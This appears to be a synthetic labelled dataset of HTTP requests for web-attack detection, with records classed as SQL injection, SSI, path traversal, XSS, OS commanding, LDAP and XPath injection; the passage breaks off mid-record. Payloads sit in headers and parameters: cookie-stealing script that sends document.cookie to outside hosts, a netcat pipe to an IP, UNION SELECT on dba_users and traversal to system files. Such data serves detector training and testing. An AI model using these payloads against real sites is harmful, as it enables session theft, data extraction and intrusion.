Cookie: 1imn=<<script  >[document.location.replace   ('http://www.ie.com/cgi-bin/meoltema.cgi'+document.cookie);]</script    >;tRseMegdv=aFLNIJ7rFhtt
Date: Mon, 01 Feb 10 17:22:22 GMT
Expect: eciai=r9uee
If-Modified-Since: Fri, 05 Aug 05 20:17:43 UTC
If-Unmodified-Since: Wed, 01 Apr 09 08:21:41 CET
If-Match: *
If-Range: *
Max-Forwards: 31
Pragma: ts='atorsc'
Proxy-Authorization: NTLM VHhEZXpjdHludGVhdGg1OHNBaTNvd3J0c0VhSGg4YWlhbm5Jc2hlcG5lNm90ZQ==
Authorization: Basic bkV3cEVvOnNNZXJhOHdl
Range: 213803-57,-7
Referer: http://raje.st/r3indisO/eaiojo.tar.gz
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 4.3; 3o-te; rv:0.1.8) Gecko/01536646
Via: 6.5 www.eexfcm.png:0
----: ---------------------------------------------

ttalqsEd=ch/n&BjEMl4JpassthruKdf=1246457250&ett3st=xolEsd93k=d&Badmina-d=74476055&iolEAmoote2yhtt=197&ehmqhwrwhoJ=mR=eeprocessing-instruction7sOeOaee4om&2stsGX=495502&i0wambR7drqne=eik8n&omoseoj9tjat3=bwlpK7i@WlI&tgwehucich=itn]tY7oth2s8l5t&22=b>ocquc  betweenRcu&1(olike4&WrsD6=thtaccesltemt6i8(&izae2=0333&l9tmma=uenurbe99hec&adcgnw=onht\yibo

End - Id: 48258
Start - Id: 42365
class: SqlInjection
GET /zLYdOv/8DGEYeLVJekj/Nooaatptmtgu/ie.js?dssiceroUogitj=adNX&uwnlamfpnn=vt&etHoouln=toe+htbetweent%3Cstyletj%3D&zx4AeAtdidfc=sdb7nueieo&i0aTniTonna=1+a%7E&pmcaonmnzotld=0l7ithcidtsTeq&eit=77&ideoenz=chairs%27+UNION++++SELECT++ury+FROM+++dba_users+++WHERE+name+++++like+%27%2525&ertitynsho0hdh=23259558&qaaus=ciSp&eWlrRt2ua=hnwBu--QMC%40Z&nNfeien=eandt%40nnaaDbo HTTP/1.0
Host: www.rouee0n.de
Connection: stib
Accept: text/*;q=0.2, application/*;q=0.4
Accept-Charset: iso-8859-6, euc-tw;q=0.6, iso-8859-15
Accept-Encoding: *;q=0.5
Accept-Language: ug3tgtrt-cedhI;q=0.9, g-u9ee1tr;q=0.8, fse-Epbu
Cache-Control: only-if-cached
Client-ip: 177.13.123.198
Cookie: st59forbhMywtns=n
Cookie2: $Version="88"
Date: Wed, 12 Sep 07 16:54:28 GMT
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: orh6@rgaag.org
If-Modified-Since: Sun, 11 Mar 07 12:59:58 GMT
If-Unmodified-Since: Thu, 31 Aug 06 10:02:40 UTC
If-Match: *
If-None-Match: *
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 2
MIME-Version: 2.3
Pragma: diScxtij=Eoehkpr
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: Digest opaque="etieea"
Range: -966,396-333,-3990
Referer: http://www.ld8o.org/yEmdsb.jsp
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: atgcbd (lq80ZQ; aloZTjM)
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1680x018
Via: FTP/2.1 www.vohduxn.css
Transfer-Encoding: deflate
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 222.98.17.178
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42365
Start - Id: 39323
class: SSI
GET /eCbees0wryq.shtml?auotbhka=zPcokell%24hi&9fwnRh=coeer+cIsebshueiiehtaccesa&rar7danT=azs1vfnhlsx&hh=e&D@include59=it&eolaeteatTp4=dbctte3ne&ozyzT4xnoibuud=obb8yoeheydh&su3sS9egaide=2&sltossej=060&Z1JuMp=i5systemw&eenh3Eitnyn=9754947&sjnj3hadEoyi=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&norLscNA=d8xrhx3 HTTP/1.0
Host: www.8tmgtZ.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: compress, identity;q=0.8
Accept-Language: skhetId-pa, tu-E, lo-1athrash;q=0.6
Cache-Control: max-age=697
Client-ip: 11.92.216.73
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="764"
Date: Tue, 26 Dec 06 21:14:07 UTC
ETag: "NkGZJgLmq2ooIWKkf"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 11 Aug 07 18:06:45 CET
If-Unmodified-Since: Sat, 14 Feb 09 09:54:45 UTC
If-Match: *
If-None-Match: "qz-kp5cbfmOa5ffymg"
If-Range: Tue, 06 Jul 04 07:57:42 CET
Max-Forwards: 96
MIME-Version: 1.4
Pragma: hhA='0w'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Basic aWFyQ2JhOm5zc2JsZUV5
Range: -7892
Referer: http://gso8se.cz/nericSe/adh6esrE/ddcoht/ttten9f.pl
TE: trailers
Trailer: Transfer-Encoding
User-Agent: RnIff/6.8.5.5
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: le8s5t
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39323
Start - Id: 42778
class: SqlInjection
POST /asehwatfgfif6evth5a/loEmaaotelse5r3nr/usrpasswd93OPS9dh/tbloommeeieq9btw9Z/h7H.3ziHbVgumomEMQ/RinputsvblhG8HkBni/l5xD7.zWLvg0pTLt2OZ/aR8/dprrfixRastau3u0bso/9roptt/aeiJ453.sh? HTTP/1.0
Content-Length: 301
Content-Language: 9t,si4r
Content-Encoding: gzip
Content-Location: /ttngTm/i4oyeee/ihiq6oY/sjaot2cs/36it.cfm
Content-MD5: YTZyb3RzNGNlYWFvdG9wUg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 12:59:47 CET
Last-Modified: Thu, 16 Feb 06 19:23:57 UTC
Host: www.oninln.de
Connection: keep-alive
Accept: audio/*, image/gif, video/*
Accept-Charset: windows-1255;q=0.4, x-mac-chinesetrad;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: a-ebaalSrJ, Sebu-nt
Cache-Control: max-age=96
Client-ip: 47.99.144.191
Cookie: hset9RYiee=870782767;recdenmrf=qwer'  or  etllir_v.Account='14h@nn.com
Cookie2: $Version="66"
Date: Mon, 14 Mar 05 10:12:29 CET
ETag: "WF4A4@FXbzWEO3h-"
Expect: 100-continue
If-Modified-Since: Sat, 06 May 06 17:34:32 CET
If-Unmodified-Since: Mon, 25 Jul 05 07:31:16 GMT
If-Match: *
If-None-Match: "1BQ7YkM8t6UXyONrSaSB"
If-Range: Thu, 03 Jan 08 19:25:59 GMT
Max-Forwards: 1
MIME-Version: 2.2
Pragma: ea='ekeVbco'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic ZW9sZW9zZkI6bmdpc2VkZg==
Range: 169067-0
Referer: http://www.utaeU3.gov/xeUiere/titsmN.nsf
TE: deflate;q=0.0,deflate
Trailer: Authorization
User-Agent: Mozilla/7.2 (X11; U; Linux i586 5.2; 4h-49; rv:7.4.2) Gecko/11447126
UA-CPU: PowerPC
UA-OS: Linux
UA-Pixels: 449x877
Via: FTP/6.4 www.mr9I5l.js
Transfer-Encoding: identity
Upgrade: eni0R/4.4, eoh2/6.7, tsme/6.1
Warning: 901 www.ooto5.jpg "hxEMfthhileDx" 
X-Serial-Number: 58260161
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D7blJk=ov9pu&ttnrPe=fcTei2eno&eeov=7897473649&msm=lN@tlshJ&PA_vW@oSCY=47850217&eEetetEa3asr=Rth&sNediirniodb3=41184&0den5lUajlni1ej=-ecawinntjcheoCnaKwu&nstsm9aAhonl=oorth&redMni4e='e&twE1tnydux6e=esve%t1ntFog7O&_g2ZC=nye4&FiqyctDHr3oehpo=81576190&naeNit0n=ahooBxPTzS&connecteEV775YRYz=120288069

End - Id: 42778
Start - Id: 41184
class: SqlInjection
GET /eatchoreehzbrsnsosE/eemSmsgwn6itwt/e_O/dihcuogbc2tgagca/nyared78sootgDo/q9AhmxA/aUi@FH@F.D/i-@ocqGzw_MKy/cIU8RmBg.Esd1X/sHIFjkwetc/OzQ/e2fr.aspx?lHxaLSx_=o&d3hfleroiRslz=bP.LhYmJiyo&ueE=ub2b HTTP/1.1
Host: 49.92.19.14
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: euc-tw;q=0.7, cp-932, shift_jis, iso-8859-6;q=0.6, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 243.190.36.207
Cookie: tet7axss=152;rdfc=361;las=haeo;sne=yehiaceaw
Cookie2: $Version="27"
Date: Wed, 25 Jul 07 01:26:44 CET
ETag: "Ub928eM_Vw_6r6WY-jO"
Expect: tywew9ot=neizle3v;cttrefw
From: sntU@ntas0.biz
If-Modified-Since: Mon, 13 Oct 08 12:24:32 UTC
If-Unmodified-Since: Wed, 11 Feb 04 17:15:31 CET
If-Match: *
If-None-Match: *
If-Range: "o-@yxVIZ-3r4@fFwvJ"
Max-Forwards: 54
MIME-Version: 2.7
Pragma: idWr=dq8em
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: NTLM NjF0Z3NpZlZoRGZuc2hSa211b3JxbnJpYXJpZWFkaXJyYW9hbG8=
Range: 5154-283,-781,-71
Referer: /PtrtGa.mdb
TE: gzip;q=0.7,trailers
Trailer: Date
User-Agent: OR     'r3rt'   =     '     '
UA-CPU: PowerPC
UA-Disp: 8221,0714,8
UA-Color: color32
UA-Pixels: 724x926
Via: 8.9 9.233.143.28, 3.9 213.69.175.21, 4.4 143.168.216.31:1
Transfer-Encoding: identity
Upgrade: xeeyd/6.4
Warning: 570 20.88.197.170 "eeqmmpr1httetaoyox" 
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41184
Start - Id: 45551
class: PathTransversal
GET /dH0oLJubg/FCRyu3YS/tV88ZNvA3MhGU@mX@y/abD/oegce9yvtzoO.jpg?FFaR=otrn3bsa&1ohoor=e8e7s&efoaIiHbolromto=8186897112&7olnl=%5CWINNT%5Csystem.ini&5eyycdtsciurIK0=7%28oroesamnooh%5D2hE&bosWThlcncd=06610&O5uMchE=8ecssnterram&childsg0vFeeG_dropy=w&HheG=asock_stream HTTP/1.1
Host: www.tdfe.uk
Connection: keep-alive
Accept: image/gif;q=0.4
Accept-Charset: x-mac-roman
Accept-Encoding: deflate;q=0.9, deflate, gzip;q=0.8, identity;q=0.7
Accept-Language: h-ifv5kmnt, Neehblba-ssl6e, aCHasLdo-eO;q=0.1, amta-itvaveh8, 899Mlhnq-nea4N
Cache-Control: max-stale=47
Client-ip: 15.78.136.11
Cookie: lnssFaaSxbgbsa6=21811858;ukS=gFhb;ndoNmrtqi=7249;ebuincusleia=u2orotireaT'9i;QVVEaQ90bK5D=62909356
Cookie2: $Version="087"
Date: Sun, 21 Jan 07 21:36:45 UTC
ETag: W/"PFUNEE-2p-Js2P9AZMS"
Expect: urperzok
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Fri, 30 Mar 07 09:14:08 GMT
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: *
If-Range: *
Max-Forwards: 96
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 903-3,3-4324,-8
Referer: http://krir.cz/lHbo/IjeQ/onjix/dclsuSHl.swf
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: i9gSehc9/0.5.8.8
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 220x9820
Via: HTTP/9.2 86.2.124.28:29375
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45551
Start - Id: 42700
class: SqlInjection
PUT /aLP6qtQ/UDBM_6-NoNPfFyD/ooPfvm.L.html? HTTP/1.1
Content-Length: 297
Content-Language: s,dueh,n
Content-Encoding: identity
Content-Location: http://www.ocyonl.cz/rcNWi/Es35ii/llistnt.swf
Content-MD5: YTRuZTdpMnIxdXprYmFubA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 21:52:47 GMT
Last-Modified: Tue, 04 Oct 05 11:55:42 UTC
Host: www.Anns2s.net:80
Connection: seiatGi
Accept: image/*, audio/*
Accept-Charset: cp-950, shift_jis, x-mac-hebrew, x-mac-arabic, iso-8859-2
Accept-Encoding: compress, compress;q=0.5, identity, identity
Accept-Language: '    group  by    users.id     having    957=957
Cache-Control: min-fresh=0339
Client-ip: 216.81.19.92
Cookie: ethQargesecl975= 7s
Cookie2: $Version="484"
Date: Sat, 17 Jan 04 05:07:38 UTC
ETag: W/"4C7tksCaaomG@_1Ns"
Expect: thse=41osoq;itilCa
From: neeio@ame9cqfri.it
If-Modified-Since: Wed, 07 May 08 02:41:27 GMT
If-Unmodified-Since: Mon, 27 Mar 06 04:30:01 GMT
If-Match: *
If-None-Match: *
If-Range: "3jWM@b6bqZ8asOM"
Max-Forwards: 6679
MIME-Version: 4.7
Pragma: Tu=eres
Proxy-Authorization: Digest opaque="bii1e"
Authorization: Basic b253YWFubjpjaXFoYw==
Range: -04,546226-,740980-
Referer: /RdiQTosa.asmx
TE: deflate;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.6 (compatible; Konqueror/9.0; Win98; nSnnm; ptres)
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.3 www.Aoavpsa.js:20204
Transfer-Encoding: compress
Upgrade: soir3d/3.0, xatnms/0.2, lt3sxt/5.8, vouur/6.0, itisi/4.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

m5toh9n=916&EemoiCd=qy&iawb883exxws=<&mei1cdenXd=6965850&hvtahset=9&ldshee=a4P7m7e&qWb_tsamQ0f=voOuVMetdu7&64kc=e0rNzi nz4oNunionnetcatde)xp_y&Cesnewea=e_sN&Peu=6tsaqe&as3elpllaaso=9821510&tomfqetdei= f\atutnromhhttb&A4feXjcopy=trn9eryetusGba&eetnltoei2bseh=eioeF&NKselectOwindow.openA=95402

End - Id: 42700
Start - Id: 45297
class: PathTransversal
GET /bBaw/m3vservicesAlocationrknc/TaeiH/o@6Br-i.eKNRFjvM5/4D3Co_all/vwherenJ_1-AC/h1HYuJYq/oGq0R8KVWj/aeidigntehaftw/nEmVFnx.gif?d88aa=auRI.q3O-Hd&ttht=421&mn=nt9youapsoa&na6erioyecur=51975&xnow=+thh2xmlm%27t0&SeyodkfehexFtn=cSle_v&uipdtehHagsrueg=59261&iahsbadk=rse&mtpdndy=slpnem0%7Eud%5Cno&nj=785673&th1uctskabtlhhe=pERv-P0q HTTP/1.0
Host: www.olr1J.biz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: \autoexec.bat
Cache-Control: max-age=40
Cookie: j7=3lMAero;6ai=ynmMehenClmpfp
Date: Wed, 08 Sep 04 15:47:45 CET
ETag: "XxaDqCf4_hX-ocoRHGku"
Expect: 100-continue
If-Modified-Since: Mon, 20 Jul 09 06:17:42 GMT
If-Unmodified-Since: Tue, 31 Oct 06 18:16:55 UTC
If-Match: "ucoQnO-6_DdFWyObpG3Z"
If-None-Match: "q5VQs.XF4hsm18s"
If-Range: "CdSrODDyv7sIfYc"
Max-Forwards: 0
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: dnhat tciorE=dIorDai
Authorization: Digest nonce
Range: 59-5054,-329
Referer: http://www.7l1n.it/s2n8ne/siizuj/eielmeo/eohmh0I.wmn
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 5.1; cq-oe; rv:1.4.8) Gecko/93896967
UA-OS: Win95
Via: tech/9.6 20.203.34.187, 1.3 247.107.102.234
Transfer-Encoding: identity
Warning: 530 11.117.18.97 "ugheitwzT9nytats" 
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45297
Start - Id: 39212
class: SSI
PUT /oCsr/hVqFESw@br4kFCBoVA/a7s3iseoNa/yUUssHyuaz6l9A.s.tiff? HTTP/1.1
Content-Length: 204
Content-Language: 0iao2
Content-Encoding: compress
Content-Location: http://rimtrut.be/brw6p.php3
Content-MD5: bnVuOHRuY2NOMTVlaXNodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jan 09 19:45:22 GMT
Last-Modified: Sun, 22 Oct 06 13:20:24 UTC
Host: 245.79.158.243:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.3, deflate;q=0.9, deflate;q=0.4, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 64.71.108.76
Cookie2: $Version="9"
ETag: W/"yWtCdWDxCwfSmeHFrxx5"
If-Match: *
If-None-Match: *
If-Range: "65qrkqp7hJYGhgdo"
Max-Forwards: 78
Proxy-Authorization: rTnlii stmi=namTcnnr
Authorization: 0kpx r2yerr=edehOn
Referer: http://NeAontne.biz/aylm/efsoh/ilbo7dnr/yeiir.php4
User-Agent: n@GCM2G http://www.hidRmett.st
UA-CPU: Sparc
UA-Pixels: 8546x0268
Transfer-Encoding: deflate
Upgrade: rtsnd/8.0, EPe/0.5, ifwEjo/6.1, Gcurl/2.9, oebc1t/4.1
----: ------------

xXdelete1nnoOkF@=3eA&e0dng=c&&crgemn95erte=ipHg&re7us=t&de=09018028&jsng=<!--#echo var="date_gmt"-->&noetoi=uaeott st0gghh&Q2E8gxnr=rbemttdp1b H&lrrhrsEfaoely0o=341&Zp3w=egn&D6sKh836oh=lib

End - Id: 39212
Start - Id: 47705
class: XSS
GET /ads4boWieiaidesjit/Steaiee/MT/s8luncwaeEiAdnBuo/lTasd/s6ZJvBq/wZibywr@/opt1tipes5fc12ribi/6Idrsmo20itOdtio/ppU.png?FdsonmIo46ab=t-M%40GP&s2sxNs=k8conmyETsxot&arsrtudb6rNmcIg=%3Cimg+src++++%3D+%22+++++an+++++%22onmouseover++%3D++++%22+%5Bwindow.open%28%27http%3A%2F%2F61.206.198.130%2Fst.msf%27%2Bdocument.cookie%29%3B%5D+%22++%3E&0-lWnigXCY=%26%3F+-R&hl8ose9e1an=T+s%27&heuea=ni6s4noo&itttdee3e4=saereiM7as0tttctw&W_gqCfWS=340765&uawartn=xFutfsltsEd0&ye07uac=5lnullhtek0lctGa&Enenhr=%5Divvm%7Cnnhopenbta HTTP/1.1
Host: 84.49.139.178
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp, windows-874, iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: ujwhs=t
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Sun, 09 Mar 08 23:42:12 CET
ETag: W/"XsttvGY924rMZZs4W"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 18 Jul 08 16:50:30 CET
If-Unmodified-Since: Fri, 04 Apr 08 06:01:16 GMT
If-Match: *
If-None-Match: "J12uDcKVYOcKVej_a"
If-Range: *
Max-Forwards: 4
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Digest uri=http://od8dtd.org/4nMIyhoa.pdf
Range: 37-9480,573294-46248,0850-768
Referer: http://trn3t.org/m39t/eeOtibtn/sdneD/1aIi0/souid.png
TE: trailers
Trailer: Upgrade
User-Agent: sfnesMhlkh/2.2.6.8
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: rNtt/7.8, woes/8.3, tse/0.2, vktO0r/0.2, suere/2.3
Warning: 681 105.145.39.255 "iAonrneh" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47705
Start - Id: 42957
class: OsCommanding
GET /udpjdqaoeObthig/ip6a2XOZXGZ/formuSHz4oZZAG/qpWwI0qE8ggSvv7av/efgqDZl3YJj.d.P0Ha/aZmZvwEhQhdhT.html? HTTP/1.1
Host: 22.5.72.237
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: inltsene-ao
Cache-Control: gtotn='EosfTs'
Client-ip: 160.221.212.62
Cookie: ortS=|  /usr/bin/nc -vvv     94.116.216.61     80%00;wsj8TcG-XDIO=ii
Cookie2: $Version="340"
Date: Sat, 06 Dec 08 01:41:04 CET
ETag: W/"dfwVmnfK9h2fhEn1wTy"
Expect: ohdoc=nneryyAn;gSce
From: 9sarS@ifbt8.gov
If-Modified-Since: Sun, 02 Oct 05 14:07:23 CET
If-Unmodified-Since: Mon, 04 Apr 05 15:18:50 GMT
If-Match: "2hfL7mpO-23pifVzZ"
If-None-Match: "Tvp3X4WXfIDrFa7"
If-Range: Thu, 21 Dec 06 18:22:55 CET
Max-Forwards: 11
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic M251amFvaDp6anRu
Authorization: Basic OW9lSU5ucjpyZWRvc25u
Range: -287850,-00206
Referer: http://hogi.st/dqronrtL/eip2iO/ont8nLd/aKfaof/t3mi4.mpeg
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: lWpMXop5 http://www.wzKoicem.cz
UA-Disp: 0867,9888,32
UA-OS: Windows 98
UA-Color: color8
Via: 0.0 167.200.209.102, HTTP/0.3 60.244.213.207
Transfer-Encoding: compress
Upgrade: ra4F/2.5, nr6r/2.4, ltj/8.1, osrll/1.3
Warning: 721 www.5hct.jpg "d49uaeh" 
X-Forwarded-For: 9.108.251.79
X-Serial-Number: 61844777851149427
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42957
Start - Id: 37914
class: LdapInjection
GET /sIziyN_NqcFQLj2JYlGn/v5DL2Mom3LqM4oynDl/hS0BuSservicesGqYM/dbAutter/1tjfEIoB4NmtoadoM6n/aOm.7d.html?wsMnno=9&opowera=imorilOrlhe4&soi0eaEnra=s&haasnreersa=2a&am6syl=as%7Cooim%3Aronunus&coiaryImwtoeco=%29++%28%7C+%28displayName%3Dhad*%29++%28name+%3D++had*+++%29%28++mail%3Dhad*++%29&WXEkR=aMRwFkzGVTBS HTTP/1.1
Host: 89.87.23.201
Connection: keep-alive
Accept: video/*, text/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.3, gzip
Accept-Language: ntod-gCuiuy;q=0.0
Cache-Control: no-store
Client-ip: 206.217.112.201
Cookie: msmntE=Deolm8Et
Cookie2: $Version="988"
Date: Wed, 10 May 06 20:58:07 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: aPouw=afta
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Fri, 12 Dec 08 01:44:47 GMT
If-Match: *
If-None-Match: "nn.aGJcXiGQ.bxX9"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 416
MIME-Version: 7.8
Pragma: Pns=n0dySecy
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: NTLM aXJuY2g4ZWxzbmRsY3JicmtkZ2VzYWhjdGRlb0FlZXhkZWNhbmdmb2E1dHBtbg==
Range: 462856-56111,-65
Referer: /aegaoI8a/4sSum.txt
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.9 (X11; U; SunOS sun4u 2.9; yE-n3; rv:6.6.9) Gecko/85221718
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: umnc2
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37914
Start - Id: 46305
class: PathTransversal
GET /j3_fb8E_FDNRK/rssdtt4n4erqaxBihhio/0p9G/lsOabxananghus/optWLm3Q/csr4A/f6embueaa9dahwuE/81b/0lmk22er9mo9/ucumE0u0s/Ysiems.shtml?jtn=aQsBfJ15KuBt&SYRLzTnph-4x13=0d4o&teezttw=o%3A%2F.htaccess%7E&eiWsrts56ye8=nwhtvdLaseaO&rrsES4Oyueh=4&darwIrbuamt=oed7mb&yovlr9=aIu&eqlr=34&1pnseaa0rkqga=6793171&6POyg0tR.bin=lO HTTP/1.0
Host: 20.196.143.218:0
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: 2rhnhiSn-nse, Wep-e0n;q=0.4
Cache-Control: no-transform
Client-ip: 206.214.212.144
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="53"
Date: Tue, 27 Apr 10 02:48:19 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 4wuSeahj
From: twei@aedq.de
If-Modified-Since: Fri, 17 Jul 09 18:12:58 GMT
If-Unmodified-Since: Thu, 07 Oct 04 13:55:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: aipJ gheooifl=9eb9
Range: 5-,07-2
Referer: http://www.bnaeb.st/lbmUes5/toxrm/oxsoe2e/6utx8/rsesadhr.asp
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.8 (X11; U; Linux i386 6.9; et-Sa; rv:7.5.3) Gecko/90808857
UA-CPU: Sparc
UA-Disp: 609,9430,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/6.5 www.cxItcHf.tiff, 0.1 www.narjVfj.tiff, 3.3 176.227.63.90
Transfer-Encoding: identity
Upgrade: ses/1.2, oIU6/4.9
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46305
Start - Id: 35560
class: XPathInjection
PUT /dt/yib5@n/taU/h0mn8ty/2ZDECNdHhtpassV/lxG4wlL7Dil@a/YXE/i7NLrSpY/vN9JO.jpeg? HTTP/1.1
Content-Length: 471
Content-Language: Rdwnbd
Content-Encoding: identity
Content-Location: http://www.ipoa.fr/coee8g/ertieczt.php
Content-MD5: bHNhdHFlc2V0c3Rid3BzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 May 09 23:02:29 GMT
Last-Modified: Fri, 02 May 08 15:38:23 GMT
Host: 143.89.186.218
Connection: eojaln3
Accept: image/png, application/postscript;q=0.7, application/*;q=0.0
Accept-Charset: euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: nlooe-een;q=0.3, frmnany-4id;q=0.4
Cache-Control: 4imeUee='xrtsva'
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="8"
Date: Thu, 09 Jun 05 04:36:07 UTC
